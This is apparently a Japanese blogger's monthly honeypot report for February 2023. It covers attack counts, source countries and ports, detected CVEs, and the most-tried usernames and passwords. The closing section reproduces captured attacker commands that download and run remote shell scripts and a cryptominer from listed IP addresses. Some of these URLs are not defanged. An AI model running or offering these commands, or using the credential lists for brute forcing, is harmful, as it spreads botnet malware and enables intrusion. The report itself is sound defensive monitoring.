ハニーポット運用(月次報告:2023年2月)

１．SECCON 2022 電脳会議参加

2023年2月11日と2月12日に開催されたSECCON 2022 電脳会議に参加した。
よわよわエンジニアでもイベントや勉強会に参加するとモチベーションアップにつながるので有難いことである。

www.seccon.jp

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2023年2月10日-2023年2月21日

運用期間：11日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月順位
1	Honeytrap	192,798	2(↑)
2	Heralding	177,978	5(↑)
3	Ddospot	129,894	1(↓)
4	Cowrie	117,313	3(↓)
5	Dionaea	74,989	4(↑)
6	Mailoney	9,227	7(↑)
7	Adbhoney	8,855	9(↑)
8	Tanner	1,816	10(↑)
9	Redishoneypot	909	8(↓)
10	ConPot	887	13(↑)
11	Ciscoasa	731	6(↓)
12	CitrixHoneypot	676	11(↓)
13	ElasticPot	290	13(→)
14	Ipphoney	67	14(→)
15	Dicompot	61	15(→)

Result
- Honeytrapへのアクセスが増加傾向にあった

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Russia	176,848	5(↑)
2	United States	107,551	2(→)
3	Brazil	101,358	1(↓)
4	Netherlands	67,924	6(↑)
5	China	42,793	3(↓)
6	India	19,569	8(↑)
7	United Kingdom	13,429	7(→)
8	Vietnam	11,975	17(↑)
9	Sweden	11,270	10(↑)
10	Hong Kong	9,341	14(↑)
11	Latvia	9,210	12(↑)
12	Monaco	7,694	圏外(↑)
13	Iran	6,333	13(→)
14	Germany	6,143	15(↑)
15	Panama	5,911	圏外(↑)
16	Japan	5,267	16(→)
17	South Korea	5,162	9(↓)
18	Italy	4,997	圏外(↑)
19	Indonesia	4,738	18(↓)
20	Saudi Arabia	4,640	圏外(↑)

Result
- ロシアからのアクセスが増える一方で中国からのアクセスが少ない傾向にあった

上位10ヵ国のアクセスポートの分布は以下の通り

攻撃元の国名	宛先ポート	件数
Russia	5900	122,465
Russia	445	4,544
Russia	23	1,537
Russia	22	592
Russia	34567	555
Russia	6379	487
Russia	3389	222
Russia	123	176
Russia	80	170
Russia	443	153
United States	123	5,330
United States	53	2,249
United States	22	2,228
United States	445	1,159
United States	5555	1,066
United States	23	811
United States	2323	330
United States	80	265
United States	6379	246
United States	81	242
Brazil	53	97,066
Brazil	445	2,790
Brazil	123	297
Brazil	23	115
Brazil	22	82
Brazil	2323	64
Brazil	1935	53
Brazil	8131	53
Brazil	5555	51
Brazil	60023	41
Netherlands	5900	53,759
Netherlands	123	265
Netherlands	19	124
Netherlands	22	121
Netherlands	23	50
Netherlands	5038	42
Netherlands	2020	40
Netherlands	2050	40
Netherlands	3376	40
Netherlands	3390	40
China	22	3,667
China	23	2,332
China	3389	1,757
China	445	1,473
China	123	1,305
China	53	662
China	21	617
China	60023	536
China	1433	481
China	2375	387
India	445	10,518
India	22	1,476
India	23	165
India	123	139
India	2323	91
India	6379	56
India	3375	40
India	3391	40
India	10001	36
India	60023	32
United Kingdom	25	7,230
United Kingdom	123	369
United Kingdom	22	253
United Kingdom	8080	163
United Kingdom	9001	90
United Kingdom	53	83
United Kingdom	9000	76
United Kingdom	445	69
United Kingdom	1515	63
United Kingdom	3389	59
Vietnam	445	7,087
Vietnam	22	794
Vietnam	123	45
Vietnam	23	33
Vietnam	5900	20
Vietnam	5555	15
Vietnam	1433	9
Vietnam	80	8
Vietnam	3052	5
Vietnam	3389	5
Sweden	22	2,088
Sweden	80	636
Sweden	5555	111
Sweden	5900	98
Sweden	123	94
Sweden	2323	76
Sweden	23	37
Sweden	445	24
Sweden	443	15
Sweden	60023	3
Hong Kong	53	2,490
Hong Kong	1025	238
Hong Kong	445	148
Hong Kong	5555	148
Hong Kong	8125	107
Hong Kong	81	99
Hong Kong	123	74
Hong Kong	2308	73
Hong Kong	22	70
Hong Kong	2121	67

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	384,940
2	CVE-2020-11910	11
3	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	9

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	5,569
2	admin	1,618
3	sa	913
4		856
5	22	400
6	user	283
7	!root	199
8	2Wire	199
9	support	179
10	guest	158
11	666666	143
12	Admin	135
13	blank	118
14	factory	107
15	test	106
16	cameras	105
17	adm	103
18	debug	102
19	unknown	100
20	0	99
21	ubnt	97
22	ubuntu	97
23	$ALOC$	96
24	pi	96
25	oracle	91
26	www	86
27	anonymous	76
28	web	73
29	ftp	68
30	data	67
31	postgres	67
32	supervisor	64
33	db	63
34	default	63
35	wwwroot	61
36	user1	50
37	tech	47
38	ftpuser	46
39	steam	45
40	service	42
41	centos	35
42	mysql	33
43	Administrator	32
44	admin1	30
45	dolphinscheduler	30
46	git	30
47	testuser	30
48	administrator	29
49	esuser	29
50	mother	27

Result
- dolphinschedulerは Apache DolphinScheduler (オープンソースのワークフロー作成プラットフォーム) と考えられる

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	admin	1,093
2		969
3	password	763
4	123456	721
5	12345678	426
6	12345	386
7	Password	347
8	blank	304
9	1234	303
10	0	251
11	root	245
12	user	208
13	666666	191
14	00000000	177
15	ubnt	165
16	123	161
17	support	155
18	alpine	138
19	hi3518	134
20	master	116
21	Aa123456.	113
22	1	110
23	unknown	110
24	1q2w3e4r	109
25	Passw0rd	108
26	backup	102
27	!ishtar	100
28	factory	100
29	cameras	99
30	1234admin	98
31	pass	97
32	synnet	96
33	1234567890	95
34	54321	94
35	_Cisco	93
36	10023	91
37	7ujMko0admin	89
38	1qaz2wsx	78
39	888888	73
40	guest	71
41	1234qwer	70
42	11111111	68
43	123123	67
44	passw0rd	67
45	1111	55
46	service	54
47	5up	52
48	test	52
49	system	50
50	Win1doW$	49

Result
- admin 7ujMko0admin と admin:Win1doW$はIoT機器に対するよく使われるユーザ名:パスワードの組み合わせである

⑥今月のmasscanとZmap

massscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

今月のアクセス
- blackcatというBotnetからのアクセスを確認した。IPアドレスは 109.206.240.231 から提供されている

No	アクセス
1	cd /data/local/tmp/; busybox wget hxxp://109.206.240.9/w.sh; sh w.sh; curl hxxp://109.206.240.9/c.sh; sh c.sh; wget hxxp://109.206.240.9/wget.sh; sh wget.sh; curl hxxp://109.206.240.9/wget.sh; sh wget.sh; busybox wget hxxp://109.206.240.9/wget.sh; sh wget.sh; busybox curl hxxp://109.206.240.9/wget.sh; sh wget.sh
2	cd /data/local/tmp/; busybox wget hxxp://botnet.blackcat7.cyou//w.sh; sh w.sh; curl hxxp://botnet.blackcat7.cyou//c.sh; sh c.sh; wget hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; curl hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; busybox wget hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; busybox curl hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh
3	cd /data/local/tmp/; busybox wget hxxp://85.209.134.231/w.sh; sh w.sh; curl hxxp://85.209.134.231/c.sh; sh c.sh; wget hxxp://85.209.134.231/wget.sh; sh wget.sh; curl hxxp://85.209.134.231/wget.sh; sh wget.sh; busybox wget hxxp://85.209.134.231/wget.sh; sh wget.sh; busybox curl hxxp://85.209.134.231/wget.sh; sh wget.sh
4	cd /data/local/tmp/; busybox wget hxxp://167.172.79.33/w.sh; sh w.sh; curl hxxp://167.172.79.33/c.sh; sh c.sh; wget hxxp://167.172.79.33/wget.sh; sh wget.sh; curl hxxp://167.172.79.33/wget.sh; sh wget.sh; busybox wget hxxp://167.172.79.33/wget.sh; sh wget.sh; busybox curl hxxp://167.172.79.33/wget.sh; sh wget.sh
5	cd /data/local/tmp/; busybox wget hxxp://139.162.63.250/w.sh; sh w.sh; curl hxxp://139.162.63.250/c.sh; sh c.sh; wget hxxp://139.162.63.250/wget.sh; sh wget.sh; curl hxxp://139.162.63.250/wget.sh; sh wget.sh; busybox wget hxxp://139.162.63.250/wget.sh; sh wget.sh; busybox curl hxxp://139.162.63.250/wget.sh; sh wget.sh
6	cd /data/local/tmp/; busybox wget hxxp://142.93.128.246/w.sh; sh w.sh; curl hxxp://142.93.128.246/c.sh; sh c.sh; wget hxxp://142.93.128.246/wget.sh; sh wget.sh; curl hxxp://142.93.128.246/wget.sh; sh wget.sh; busybox wget hxxp://142.93.128.246/wget.sh; sh wget.sh; busybox curl hxxp://142.93.128.246/wget.sh; sh wget.sh
7	cd /data/local/tmp/; busybox wget 109.206.240.231/w.sh; sh w.sh; curl 109.206.240.231/c.sh; sh c.sh; wget 109.206.240.231/wget.sh; sh wget.sh; curl 109.206.240.231/wget.sh; sh wget.sh; busybox wget 109.206.240.231/wget.sh; sh wget.sh; busybox curl 109.206.240.231/wget.sh; sh wget.sh
8	nproc;uname -a;cd /tmp;wget hxxp://58.135.80.99/a/miner.sh;bash miner.sh;cd /tmp;curl -sS hxxp://58.135.80.99/a/divu2\|perl;wget -O - hxxp://58.135.80.99/a/divu2\|perl;rm -rf div* miner.sh
9	cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget hxxp://107.189.5.161/w.sh; sh w.sh; curl hxxp://107.189.5.161/c.sh; sh c.sh
10	cd /data/local/tmp/; busybox wget hxxp://185.216.71.65/w.sh; sh w.sh; curl hxxp://185.216.71.65/c.sh; sh c.sh
11	cd /data/local/tmp/; busybox wget hxxp://193.42.33.21/w.sh; sh w.sh; curl hxxp://193.42.33.21/c.sh; sh c.sh
12	#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget hxxp://23.235.171.196:1211/112; curl -O hxxp://23.235.171.196:1211/112; chmod +x 112; ./112; rm -rf 123.sh; history -c;
13	cd /data/local/tmp/; busybox wget hxxp://141.255.160.234/w.sh; sh w.sh; curl hxxp://141.255.160.234/c.sh; sh c.sh
14	cd /data/local/tmp/; busybox wget hxxp://47.87.229.145/w.sh; sh w.sh; curl hxxp://47.87.229.145/c.sh; sh c.sh
15	cd /data/local/tmp/; busybox wget hxxp://149.127.237.221/w.sh; sh w.sh; curl hxxp://149.127.237.221/c.sh; sh c.sh
16	cd /data/local/tmp/; busybox wget hxxp://111.92.242.146/w.sh; sh w.sh; curl hxxp://111.92.242.146/c.sh; sh c.sh
17	cd /tmp ; wget 212.193.30.26/okay.sh ; sh okay.sh ; rm -rf okay.sh ; curl -O 212.193.30.26/okay.sh ; sh okay.sh ; rm -rf okay.sh ; history -c
18	cd /data/local/tmp/; busybox wget hxxp://100.43.163.61/w.sh; sh w.sh; curl hxxp://100.43.163.61/c.sh; sh c.sh
19	cd /data/local/tmp/; busybox wget hxxp://193.111.250.222/bins/w.sh; sh w.sh; curl hxxp://193.111.250.222/bins/c.sh; sh c.sh

今月の作業BGM

曲名	アーティスト	備考
Shape of You	Ed Sheeran	---

Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2023年2月)

１．SECCON 2022 電脳会議参加

今月のChangelog

前提条件

運用日時：2023年2月10日-2023年2月21日

運用期間：11日

結果

①各ハニーポットで検知したAttack件数

②攻撃元の国名と件数(Top 20)

③検知したCVEの脆弱性と件数

④よく攻撃されるユーザ名

⑤よく攻撃されるパスワード

⑥今月のmasscanとZmap

最後に

今月の作業BGM

１．SECCON 2022 電脳会議 参加

今月のChangelog

前提条件

運用日時：2023年2月10日-2023年2月21日

運用期間：11日

結果

①各ハニーポットで検知したAttack件数

②攻撃元の国名と件数(Top 20)

③検知したCVEの脆弱性と件数

④よく攻撃されるユーザ名

⑤よく攻撃されるパスワード

⑥今月のmasscanとZmap

最後に

今月の作業BGM

１．SECCON 2022 電脳会議参加